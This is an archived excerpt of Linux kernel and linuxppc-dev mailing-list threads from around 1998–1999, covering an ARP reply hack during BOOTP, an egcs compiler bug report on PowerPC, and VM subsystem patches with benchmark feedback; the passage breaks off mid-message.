> that is, it publishes its own NIC address as matching EVERY local IP.

A quick test showed that this problem does not occur on 2.0.X kernels.
I'm not sure where exactly within 2.1.X history it appeared.

Also, here is a temporary, ugly and rude hack that, most importantly,
works for me, at least until there is an "official" patch. It checks
within arp_rcv() whether the interface has any IP address configured,
and if not, just drops the packet. So here's a hack to the file
/net/ipv4/arp.c:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*** /net/ipv4/arp.c	Thu Dec  3 18:12:56 1998
--- /net/ipv4/arp.c	Thu Dec  3 18:14:26 1998
***************
*** 550,555 ****
--- 550,567 ----
  	    arp->ar_pln != 4)
  		goto out;
  
+ #if 1
+ 	/* XXX  rude hack to prevent ARP replies during BOOTP */
+ 	{
+ 		struct in_ifaddr *ifa = in_dev->ifa_list;
+ 		for ( ; ifa; ifa = ifa->ifa_next)
+ 			if (ifa->ifa_local || ifa->ifa_address)
+ 				break;
+ 		if (!ifa)
+ 			goto out;
+ 	}
+ #endif
+ 
  	switch (dev_type) {
  	default:	
  		if (arp->ar_pro != __constant_htons(ETH_P_IP))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

I am not sure, though, whether I should actually put this piece of code
in icmp_rcv() instead, which would be logically correct; I wasn't sure
whether that would have any other *bad* side effects.
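
For readers without the kernel tree at hand, the test the hack performs can
be sketched in plain C as below.  This is a simplified stand-in, not kernel
code: the struct and the function name are invented for the example, and the
two fields only play the role of ifa_local and ifa_address.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for the kernel's struct in_ifaddr (assumption). */
struct ifaddr_sketch {
	struct ifaddr_sketch *next;
	uint32_t local;		/* plays the role of ifa_local */
	uint32_t address;	/* plays the role of ifa_address */
};

/*
 * Return 1 if at least one entry on the list carries a non-zero
 * address, 0 if the interface is still unconfigured.
 */
static int iface_has_address(const struct ifaddr_sketch *ifa)
{
	for (; ifa != NULL; ifa = ifa->next)
		if (ifa->local || ifa->address)
			return 1;
	return 0;
}
```

With a check like this, an ARP request arriving while the list is empty or
all-zero would be dropped instead of answered.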

I welcome all comments :-)

Oren.
__________________________________________________________________________
                         ______   ____   ___  ___  _  __                  \
MOSIX Development Group  )  )  )  )   ) (  '   )   \ /      Oren Laadan    \
 The Hebrew University  /  /  /  /   /   \    /     /   orenl@cs.huji.ac.il \
 of Jerusalem,  Israel (     (  (___(  ___) _(_  __/ \_______________________)

     http://www.mosix.cs.huji.ac.il     



^ permalink raw reply	[relevance 62%]

* egcs bug  - who can I send it to ?
@ 1998-12-27 13:01 64% Jens Ch. Restemeier
  1998-12-27 17:59 64% ` Hollis R Blanchard
  1998-12-27 19:13 64% ` David Edelsohn
  0 siblings, 2 replies; 200+ results
From: Jens Ch. Restemeier @ 1998-12-27 13:01 UTC (permalink / raw)
  To: linuxppc-dev


Hi !

I've got a problem compiling the latest snapshot of crystal space on
Linux/PPC. The same archive compiles on my 486 (after some small fixes).

The RPMS I installed didn't have a "mail me for bugs" address.

Is this a known bug ?

util/gfx/gifimage.cpp: In method `ImageGifFile::ImageGifFile(UByte *,
long int)':
util/gfx/gifimage.cpp:383: internal error--unrecognizable insn:
(insn 3958 3955 54 (set (mem:SI (plus:SI (reg:SI 18 r18)
                (const_int 65536)))
        (reg:SI 19 r19)) -1 (insn_list 3621 (insn_list 3955 (nil)))
    (nil))
toplev.c:1360: Internal compiler error in function fatal_insn
make[1]: *** [out/LINUX/X11_o/util/gfx/gifimage.o] Error 1
make: *** [cs] Error 2

Jens

^ permalink raw reply	[relevance 64%]

* Re: egcs bug  - who can I send it to ?
  1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
@ 1998-12-27 17:59 64% ` Hollis R Blanchard
  1998-12-28  4:07 64%   ` David Edelsohn
  1998-12-27 19:13 64% ` David Edelsohn
  1 sibling, 1 reply; 200+ results
From: Hollis R Blanchard @ 1998-12-27 17:59 UTC (permalink / raw)
  To: Jens Ch. Restemeier; +Cc: linuxppc-dev


On Sun, 27 Dec 1998, Jens Ch. Restemeier wrote:
> 
> I've got a problem compiling the latest snapshot of crystal space on
> Linux/PPC. The same archive compiles on my 486 (after some small fixes).
> 
> The RPMS I installed didn't have a "mail me for bugs" address.
> 
> Is this a known bug ?
> 
> util/gfx/gifimage.cpp: In method `ImageGifFile::ImageGifFile(UByte *,
> long int)':
> util/gfx/gifimage.cpp:383: internal error--unrecognizable insn:
> (insn 3958 3955 54 (set (mem:SI (plus:SI (reg:SI 18 r18)
>                 (const_int 65536)))
>         (reg:SI 19 r19)) -1 (insn_list 3621 (insn_list 3955 (nil)))
>     (nil))
> toplev.c:1360: Internal compiler error in function fatal_insn
> make[1]: *** [out/LINUX/X11_o/util/gfx/gifimage.o] Error 1
> make: *** [cs] Error 2

I think "internal compiler errors" are usually due to an optimization setting
that's too high. Look for a -O switch in your Makefile, and set it to 2 or
below (-O2, -O1, or -O0).

-Hollis


^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 13:01 64% egcs bug - who can I send it to ? Jens Ch. Restemeier
  1998-12-27 17:59 64% ` Hollis R Blanchard
@ 1998-12-27 19:13 64% ` David Edelsohn
  1998-12-27 20:29 64%   ` Jens Ch. Restemeier
  1 sibling, 1 reply; 200+ results
From: David Edelsohn @ 1998-12-27 19:13 UTC (permalink / raw)
  To: jenschrr; +Cc: linuxppc-dev


	Which release of EGCS are you running?  You do not provide any
information about the compiler, but I suspect that this is fixed in
egcs-1.1.1. 

David

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 19:13 64% ` David Edelsohn
@ 1998-12-27 20:29 64%   ` Jens Ch. Restemeier
  1998-12-28  4:19 64%     ` David Edelsohn
  0 siblings, 1 reply; 200+ results
From: Jens Ch. Restemeier @ 1998-12-27 20:29 UTC (permalink / raw)
  To: David Edelsohn; +Cc: linuxppc-dev


David Edelsohn wrote:
> 
>         Which release of EGCS are you running?  You do not provide any
> information about the compiler, but I suspect that this is fixed in
> egcs-1.1.1.

Whoops, it's egcs-2.91.57. Does this help ?

Jens

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 17:59 64% ` Hollis R Blanchard
@ 1998-12-28  4:07 64%   ` David Edelsohn
  0 siblings, 0 replies; 200+ results
From: David Edelsohn @ 1998-12-28  4:07 UTC (permalink / raw)
  To: Hollis R Blanchard; +Cc: Jens Ch. Restemeier, linuxppc-dev


>>>>> Hollis R Blanchard writes:

Hollis> I think "internal compiler errors" are usually due to an optimization setting
Hollis> that's too high. Look for a -O switch in your Makefile, and set it to 2 or
Hollis> below (-O2, -O1, or -O0).

	Sorry, this is incorrect.  These errors may only OCCUR when
optimizing, but they are not DUE to optimizing.  EGCS ignores any
optimization levels higher than -O3.  EGCS is not pgcc, so please do not
try to apply pgcc/Linux on Intel knowledge.

David

^ permalink raw reply	[relevance 64%]

* Re: egcs bug - who can I send it to ?
  1998-12-27 20:29 64%   ` Jens Ch. Restemeier
@ 1998-12-28  4:19 64%     ` David Edelsohn
  0 siblings, 0 replies; 200+ results
From: David Edelsohn @ 1998-12-28  4:19 UTC (permalink / raw)
  To: jenschrr; +Cc: linuxppc-dev


>>>>> "Jens Ch Restemeier" writes:

Jens> Whoops, it's egcs-2.91.57. Does this help ?

	I believe that egcs-1.1.1 reports itself as egcs-2.91.60:

		gcc version egcs-2.91.60 19981201 (egcs-1.1.1 release)

There was a PowerPC address generation bug which was fixed just before
egcs-1.1.1 was released and it might address your problem.  There is no
way for me to advise about developer interim snapshots.

David

^ permalink raw reply	[relevance 64%]

* Re: 2.2.0 Bug summary
       [not found]     <199812290146.BAA12687@terrorserver.swansea.linux.org.uk>
@ 1998-12-31 18:00 35% ` Andrea Arcangeli
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1998-12-31 18:00 UTC (permalink / raw)
  To: Alan Cox
  Cc: linux-kernel, Linus Torvalds, Stephen C. Tweedie,
	Benjamin Redelings I, Rik van Riel, linux-mm

On Tue, 29 Dec 1998, Alan Cox wrote:

> o	Linus VM is still 20% slower than sct vm on an 8Mb machine
> 	[benchmarks kernel build and netscape]

Today I started playing with Linus's VM in 2.2.0-pre1. I changed the
semantics of many things and added a heuristic so that one process
thrashing memory will not hang other "normal" processes. The new VM I
developed today is _far_ better than sct's ac11 VM and anything I tried
before. I would like somebody to try it on low-memory machines as well
and report what happens there.  I don't have enough spare time to test
it on many kinds of hardware myself.

The same benchmark that took 106 sec on a clean 2.2.0-pre1 to dirty
160 MB of virtual memory (run with 128 MB of RAM and 72 MB of swap as
physical memory) now runs in 90 sec. That is not the most important
thing, though: the good point is that the cache/buffer/swap levels are
now perfectly stable, and all other processes run fine and are not pushed
out of cache even if a memory thrasher is running at the same time.

Comments?

Ah, the shrink_mmap limit was wrong, since we account only for
unreferenced pages.
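
To make the size of that change concrete, here is a small C sketch of the
scan budget before and after the filemap.c hunk in this mail.  The two
function names are invented for the example; only the two expressions come
from the patch.

```c
/* Scan budget as computed before the patch: (limit << 1) >> priority. */
static int scan_count_old(int limit, int priority)
{
	return (limit << 1) >> priority;
}

/* Scan budget as computed after the patch: limit >> priority. */
static int scan_count_new(int limit, int priority)
{
	return limit >> priority;
}
```

For any given limit and priority the new budget is half the old one, for
instance 16 instead of 32 pages with limit 1024 at priority 6.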

Patch against 2.2.0-pre1:

Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.7 linux/mm/filemap.c:1.1.1.1.2.29
--- linux/mm/filemap.c:1.1.1.7	Wed Dec 23 15:25:21 1998
+++ linux/mm/filemap.c	Thu Dec 31 17:56:27 1998
@@ -125,7 +129,7 @@
 	struct page * page;
 	int count;
 
-	count = (limit<<1) >> (priority);
+	count = limit >> priority;
 
 	page = mem_map + clock;
 	do {
@@ -182,6 +186,7 @@
 	return 0;
 }
 
+#if 0
 /*
  * This is called from try_to_swap_out() when we try to get rid of some
  * pages..  If we're unmapping the last occurrence of this page, we also
@@ -201,6 +206,7 @@
 	remove_inode_page(page);
 	return 1;
 }
+#endif
 
 /*
  * Update a page cache copy, when we're doing a "write()" system call
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.3 linux/mm/page_alloc.c:1.1.1.1.2.11
--- linux/mm/page_alloc.c:1.1.1.3	Sun Dec 20 16:31:11 1998
+++ linux/mm/page_alloc.c	Thu Dec 31 17:56:27 1998
@@ -241,7 +241,29 @@
 			goto nopage;
 		}
 
-		if (freepages.min > nr_free_pages) {
+		if (freepages.high < nr_free_pages)
+		{
+			if (current->trashing_memory)
+			{
+				current->trashing_memory = 0;
+#if 0
+				printk("trashing end for %s\n", current->comm);
+#endif
+			}
+		} else if (freepages.min > nr_free_pages) {
+			if (!current->trashing_memory)
+			{
+				current->trashing_memory = 1;
+#if 0
+				printk("trashing start for %s\n", current->comm);
+#endif
+			}
+		}
+
+		/*
+		 * Block the process that is trashing memory. -arca
+		 */
+		if (current->trashing_memory) {
 			int freed;
 			freed = try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX);
 			/*
Index: linux/mm/swap_state.c
diff -u linux/mm/swap_state.c:1.1.1.3 linux/mm/swap_state.c:1.1.1.1.2.8
--- linux/mm/swap_state.c:1.1.1.3	Sun Dec 20 16:31:12 1998
+++ linux/mm/swap_state.c	Tue Dec 22 18:42:03 1998
@@ -248,7 +248,7 @@
 		delete_from_swap_cache(page);
 	}
 	
-	free_page(addr);
+	__free_page(page);
 }
 
 
@@ -261,6 +261,9 @@
 struct page * lookup_swap_cache(unsigned long entry)
 {
 	struct page *found;
+#ifdef	SWAP_CACHE_INFO
+	swap_cache_find_total++;
+#endif
 	
 	while (1) {
 		found = find_page(&swapper_inode, entry);
@@ -268,8 +271,12 @@
 			return 0;
 		if (found->inode != &swapper_inode || !PageSwapCache(found))
 			goto out_bad;
-		if (!PageLocked(found))
+		if (!PageLocked(found)) {
+#ifdef	SWAP_CACHE_INFO
+			swap_cache_find_success++;
+#endif
 			return found;
+		}
 		__free_page(found);
 		__wait_on_page(found);
 	}
Index: linux/mm/vmalloc.c
diff -u linux/mm/vmalloc.c:1.1.1.2 linux/mm/vmalloc.c:1.1.1.1.2.2
--- linux/mm/vmalloc.c:1.1.1.2	Fri Nov 27 11:19:11 1998
+++ linux/mm/vmalloc.c	Fri Nov 27 11:41:42 1998
@@ -185,7 +185,8 @@
 	for (p = &vmlist ; (tmp = *p) ; p = &tmp->next) {
 		if (tmp->addr == addr) {
 			*p = tmp->next;
-			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr), tmp->size);
+			vmfree_area_pages(VMALLOC_VMADDR(tmp->addr),
+					  tmp->size - PAGE_SIZE);
 			kfree(tmp);
 			return;
 		}
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.6 linux/mm/vmscan.c:1.1.1.1.2.43
--- linux/mm/vmscan.c:1.1.1.6	Tue Dec 22 11:56:28 1998
+++ linux/mm/vmscan.c	Thu Dec 31 17:56:27 1998
@@ -162,8 +162,8 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
-				free_page(page);
-				return (atomic_read(&page_map->count) == 0);
+				__free_page(page_map);
+				return atomic_read(&page_map->count) + 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +180,8 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
-		free_page(page);
-		return 1;	/* we slept: the process may not exist any more */
+		__free_page(page_map);
+		return atomic_read(&page_map->count) + 1;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +194,8 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
-		free_page(page);
-		return (atomic_read(&page_map->count) == 0);
+		__free_page(page_map);
+		return atomic_read(&page_map->count) + 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +210,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return atomic_read(&page_map->count) + 1;
 }
 
 /*
@@ -369,8 +368,14 @@
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -382,15 +387,8 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +402,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
-
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -438,44 +435,78 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	switch (swap_out(priority, gfp_mask))
+	{
+	default:
+		shrink_mmap(0, gfp_mask);
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+	case 0:
+		/* swap_out() failed to swapout */
+		if (shrink_mmap(priority, gfp_mask))
+		{
+			printk("swapout 0 shrink 1\n");
+			return 1;
+		}
+		printk("swapout 0 shrink 0\n");
+		return 0;
+	case 1:
+		/* this would be the best but should not happen right now */
+		printk(KERN_DEBUG
+		       "do_free_user_and_cache: swapout returned 1\n");
+		return 1;
+	}
+}
 
-static int kswapd_free_pages(int kswapd_state)
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 6;
+
+	kmem_cache_reap(gfp_mask);
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 5;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -523,6 +554,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -542,35 +574,24 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
+		static int state = 0;
 
 		current->flags |= PF_MEMALLOC;
 	
-		priority = 5;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -593,7 +614,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -631,9 +653,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
Index: linux/kernel/fork.c
diff -u linux/kernel/fork.c:1.1.1.3 linux/kernel/fork.c:1.1.1.1.2.6
--- linux/kernel/fork.c:1.1.1.3	Thu Dec  3 12:55:12 1998
+++ linux/kernel/fork.c	Thu Dec 31 17:56:28 1998
@@ -567,6 +570,7 @@
 
 	/* ok, now we should be set up.. */
 	p->swappable = 1;
+	p->trashing_memory = 0;
 	p->exit_signal = clone_flags & CSIGNAL;
 	p->pdeath_signal = 0;
 
Index: linux/include/linux/sched.h
diff -u linux/include/linux/sched.h:1.1.1.2 linux/include/linux/sched.h:1.1.1.1.2.7
--- linux/include/linux/sched.h:1.1.1.2	Tue Dec 29 01:39:00 1998
+++ linux/include/linux/sched.h	Thu Dec 31 17:56:29 1998
@@ -268,6 +273,7 @@
 /* mm fault and swap info: this can arguably be seen as either mm-specific or thread-specific */
 	unsigned long min_flt, maj_flt, nswap, cmin_flt, cmaj_flt, cnswap;
 	int swappable:1;
+	int trashing_memory:1;
 	unsigned long swap_address;
 	unsigned long old_maj_flt;	/* old value of maj_flt */
 	unsigned long dec_flt;		/* page fault count of the last time */
@@ -353,7 +359,7 @@
 /* utime */	{0,0,0,0},0, \
 /* per CPU times */ {0, }, {0, }, \
 /* flt */	0,0,0,0,0,0, \
-/* swp */	0,0,0,0,0, \
+/* swp */	0,0,0,0,0,0, \
 /* process credentials */					\
 /* uid etc */	0,0,0,0,0,0,0,0,				\
 /* suppl grps*/ 0, {0,},					\





--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 35%]

* [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:00 35% ` 2.2.0 Bug summary Andrea Arcangeli
@ 1998-12-31 18:34 64%   ` Andrea Arcangeli
  1999-01-01  0:16 64%     ` Steve Bergman
  1999-01-01 16:44 51%     ` Andrea Arcangeli
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1998-12-31 18:34 UTC (permalink / raw)
  To: Alan Cox
  Cc: linux-kernel, Linus Torvalds, Stephen C. Tweedie,
	Benjamin Redelings I, Rik van Riel, linux-mm

On Thu, 31 Dec 1998, Andrea Arcangeli wrote:

> Comments?
> 
> Ah, the shrink_mmap limit was wrong since we account only not referenced
> pages.
> 
> Patch against 2.2.0-pre1:

Whoops, in the last email I forgot to change the subject a bit (adding
[patch]) and to remove these printks:

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.1.2.43 linux/mm/vmscan.c:1.1.1.1.2.45
--- linux/mm/vmscan.c:1.1.1.1.2.43	Thu Dec 31 17:56:27 1998
+++ linux/mm/vmscan.c	Thu Dec 31 19:41:06 1998
@@ -449,11 +449,7 @@
 	case 0:
 		/* swap_out() failed to swapout */
 		if (shrink_mmap(priority, gfp_mask))
-		{
-			printk("swapout 0 shrink 1\n");
 			return 1;
-		}
-		printk("swapout 0 shrink 0\n");
 		return 0;
 	case 1:
 		/* this would be the best but should not happen right now */



Andrea Arcangeli


^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
@ 1999-01-01  0:16 64%     ` Steve Bergman
  1999-01-01 17:16 64%       ` Andrea Arcangeli
  1999-01-01 16:44 51%     ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Steve Bergman @ 1999-01-01  0:16 UTC (permalink / raw)
  To: Andrea Arcangeli; +Cc: linux-mm

Andrea Arcangeli wrote:
> 
> On Thu, 31 Dec 1998, Andrea Arcangeli wrote:
> 
> > Comments?
> >
> > Ah, the shrink_mmap limit was wrong since we account only not referenced
> > pages.
> >
> > Patch against 2.2.0-pre1:
> 
> whoops in the last email I forget to change a bit the subject (adding
> [patch]) and this printk:

Hi,

I just tried out the patch and got very disappointing results on my
128MB AMD K6-3.  I tested by loading 117 good sized images all at once. 
This kicks it ~ 165MB into the swap (~ 293 MB mem total).  The standard
2.2.0-pre1 kernel streamed out to swap at an average of >1MB/sec and
finished in 184 seconds.  With the patched kernel I stopped at 280 sec.
At that time it had about 65 MB swapped out, or < 250K/sec.  I then
rebooted, brought up X and an xterm and went to compile the 2.1.131-ac11
patch (still running under the patched 2.2.0-pre1) and noted that during
the compile I had 17MB in the swap with nothing else going on.  Bringing
up netscape put it up to 25MB.   Suggestions? Requests?  Let me know if
you want me to try anything else.

Thanks,
Steve

^ permalink raw reply	[relevance 64%]

* BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
@ 1999-01-01 14:29 60% Jens Ch. Restemeier
  1999-01-01 19:44 64% ` Tom Rini
  1999-01-02  0:47 64% ` Ian K. Erickson
  0 siblings, 2 replies; 200+ results
From: Jens Ch. Restemeier @ 1999-01-01 14:29 UTC (permalink / raw)
  To: linuxppc-dev


Hi !

This bugreport applies to a PMac 5500/225, and maybe a 6500, because
they share a common motherboard.
I'm booting 2.2.0-pre2 kernel with BootX.

ftp://ftp.linuxppc.org/linuxppc/linuxppc-pre-R5/RedHat.installer/vmlinux-2.2.0-pre2

No-video problem:
First I'm booting with the "no video" box checked. I get a much too dark
picture, I can only see a few shades from the logo. I can't see the
login prompt. The last kernel I checked (2.1.127) didn't have this
problem.
Possible bug: palette not initialised.
Then I tried without the "no video" box. Now I get no video at all. This
is a problem I have had since the first kernel I've seen (2.1.24). Is there
a problem with my video chip ? I've got an ATI chip, ATY264GT-B.

Audio problem:
You'll see in the kernel messages that there is an error during the
initialisation of AWACS. Now audio seems to be limited to 8kHz/mono.
BTW: Where has this "woop" sound gone to ? I prefer it much over a
simple beep...

I'll try test kernels, but please strip them of all options (network,
filesystem) that are not needed to test video/audio.

I've got the usual dmesg and a dump of the OF-tree. Anybody interested
in seeing this ? It's around 3k.

Jens

P.S.: Patch ? I'd like to, but I have not much information about the
hardware. What about starting a project to document all devices in a Mac
?
P.P.S: BootX vs. OF: I'm normally booting with OF, but to test kernels
I'm using BootX. It's a very nice program...


^ permalink raw reply	[relevance 60%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1998-12-31 18:34 64%   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Andrea Arcangeli
  1999-01-01  0:16 64%     ` Steve Bergman
@ 1999-01-01 16:44 51%     ` Andrea Arcangeli
  1999-01-01 20:02 38%       ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-01 16:44 UTC (permalink / raw)
  To: Benjamin Redelings I, Stephen C. Tweedie, Linus Torvalds
  Cc: linux-kernel, Alan Cox, Rik van Riel, linux-mm

I'll try to explain my latest VM patch.

The patch basically does two things.

It adds a heuristic that blocks thrashing tasks in try_to_free_pages()
and lets normal tasks run fine in the meantime.

It returns to the old do_try_to_free_pages() way of doing things. I think
the reason the old way no longer worked well is that we were using
swap_out() like the other freeing methods, while swapout really has
nothing to do with them.

To get VM stability under low memory we must use both swap_out() (which
puts pages from the user process's virtual memory into the swap cache)
and shrink_mmap() in a new way. My new method puts user pages in the swap
cache because there we can handle aging very well. Then shrink_mmap() can
free an unreferenced page to make real progress in freeing memory (and
not only in swapping out).

So basically my patch will certainly cause the system to swap out more
than it used to, but most of the time we will not need a swapin to put
the pages back into the process's virtual memory.

Somebody reported a big slowdown of the thrashing application. Right now
I don't know which bit of the patch caused this slowdown (yesterday my
benchmark here didn't show it). My new trashing_memory heuristic will
probably decrease performance for the thrashing application (but hey, you
know that if you need performance you can always buy more RAM ;), but it
will greatly improve performance for normal non-thrashing tasks.

I'll try to change do_free_user_and_cache() to see if I can achieve
something better.

I also changed swap_out(), since I think the best way to choose a process
is to compare the raw RSS. And I don't want swap_cnt to be decreased
every time something is swapped out. I want the kernel to continue
passing through all the pages of one process once it has started playing
with it (if it still exists, of course ;). I also changed the pressure of
swap_out(), since it makes no sense to me to pass more than once over the
VM of all tasks in the system. Now at priority 6 swap_out() tries to swap
out something from at most nr_tasks/7 tasks (with a lower bound of 1
task). I also changed the pressure of shrink_mmap() because it made no
sense to me to do two passes over already unreferenced pages.
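
As a rough illustration of the swap_out() pressure rule described above,
the number of tasks looked at per call can be sketched like this. It is a
minimal standalone sketch, not the kernel code: tasks_to_scan() is a name
made up for the example, and it assumes nr_tasks is at least 1.

```c
/*
 * Sketch of the swap_out() pressure rule: at a given priority, look at
 * no more than nr_tasks / (priority + 1) tasks, but at least one.
 * tasks_to_scan() is a hypothetical helper, not a kernel function.
 */
int tasks_to_scan(int nr_tasks, int priority)
{
	int counter = nr_tasks / (priority + 1);

	if (counter < 1)
		counter = 1;		/* lower bound: always try one task */
	if (counter > nr_tasks)
		counter = nr_tasks;	/* never more than all the tasks */
	return counter;
}
```

With 70 tasks at priority 6 this gives 10 tasks, with 3 tasks at priority
6 it gives 1, and at priority 0 every task is a candidate.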

I also changed swap_out(), allowing it to return 0, 1 or more.

0 means that swap_out() was not able to put anything in the swap
cache.

1 means that swap_out() was able to swap out something and has also
freed up one page (how??? it can't right now, because the page should
always still be present at least in the swap cache)

2 means that swap_out() has swapped out 1 page and that the page is still
referenced somewhere (probably by the swap cache)

So in case 2 and case 0 we must use shrink_mmap() to make real
progress in page freeing.  This is the idea that my new
do_free_user_and_cache() follows.
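
The three return codes and what follows from them can be sketched in
standalone form as below. This is only an illustration of the idea: the
fake_swap_out() and fake_shrink_mmap() stubs and the fake_* variables are
invented so that the sketch compiles outside the kernel, and the function
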